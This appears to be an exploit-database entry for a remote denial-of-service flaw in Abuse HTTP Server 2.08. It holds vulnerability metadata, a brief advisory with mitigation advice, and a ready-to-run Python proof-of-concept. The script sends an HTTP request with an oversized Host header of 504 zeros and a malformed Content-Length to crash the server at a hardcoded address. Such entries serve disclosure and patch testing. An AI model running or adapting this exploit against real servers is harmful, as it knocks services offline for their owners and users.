Abuse HTTP Server Remote Denial-of-Service Vulnerability

vendor:

Abuse HTTP Server

by:

Zee Eichel

7,5

CVSS

HIGH

Denial-of-Service

400

CWE

Product Name: Abuse HTTP Server

Affected Version From: 2.08

Affected Version To: 2.08

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2013

Abuse HTTP Server Remote Denial-of-Service Vulnerability

Abuse HTTP Server is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause denial-of-service conditions. Abuse HTTP Server version 2.08 is vulnerable; other versions may also be affected.

Mitigation:

Apply the latest security patches to the affected system.

Source

Exploit-DB raw data:

'''
source: https://www.securityfocus.com/bid/62723/info

Abuse HTTP Server is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to cause denial-of-service conditions.

Abuse HTTP Server version 2.08 is vulnerable; other versions may also be affected. 
'''

#!/usr/bin/python

import socket
import os
import sys

crash = "0" * 504

buffer="GET / HTTP/1.1\r\n"
buffer+="Host: " + crash + "\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n"
buffer+="Content-Length : 1048580\r\n\r\n"

print "[*] Exploit c0ded by Zee Eichel - zee[at]cr0security.com"
print "[*] Change some option in code with your self"
print "[*] Connect to host and send payload"

expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("192.168.1.101", 80))
expl.send(buffer)
print "[*] Server Disconected"
expl.close()